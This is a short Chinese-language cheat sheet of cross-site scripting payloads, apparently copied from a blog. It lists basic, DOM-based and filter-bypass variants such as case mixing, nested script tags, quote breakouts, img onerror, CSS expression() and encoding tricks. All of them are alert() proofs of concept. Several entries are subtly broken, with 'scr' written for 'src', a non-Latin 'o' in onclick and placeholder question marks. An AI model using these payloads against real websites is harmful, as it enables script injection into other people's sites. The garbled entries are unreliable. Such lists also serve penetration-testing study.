最长用的肯定是:
代码语言:javascript复制<script>alert("xss")</script>
DOM型一般用
代码语言:javascript复制<a href='#' onclick="alert(1111)">Click to see?</a>
大小写绕过
代码语言:javascript复制'"><sCrIpT>alert(63252)</sCrIpT>
过滤script绕过
代码语言:javascript复制<scr<script>ipt>alert("XXSSSS")</scr</script>ipt>
htmlentities()没有过滤单引号,直接用单引号绕过
代码语言:javascript复制';alert('xss');'
构造js绕过
代码语言:javascript复制</script><script>alert('xss')</script>
收集的其它代码
代码语言:javascript复制<img scr=javascript:alert("xss")></img>
http://www.example.com/MyApp.aspx?myvar= "></XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<IFRAME SRC=javascript:alert('test')></IFRAME>
" οnclick="alert(1)"
<img scr="javascript: alert(/xss/)></img>
(?用tab键弄出来的空格)
<img scr="javas????cript:alert(/xss/)" width=150></img>
<img scr="#" onerror=alert(/xss/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
(/**/ 表示注释)
<img scr="#"/* */onerror=alert(/xss/) width=150></img>
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left: 065 078ression (alert('xss'))}></div>
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">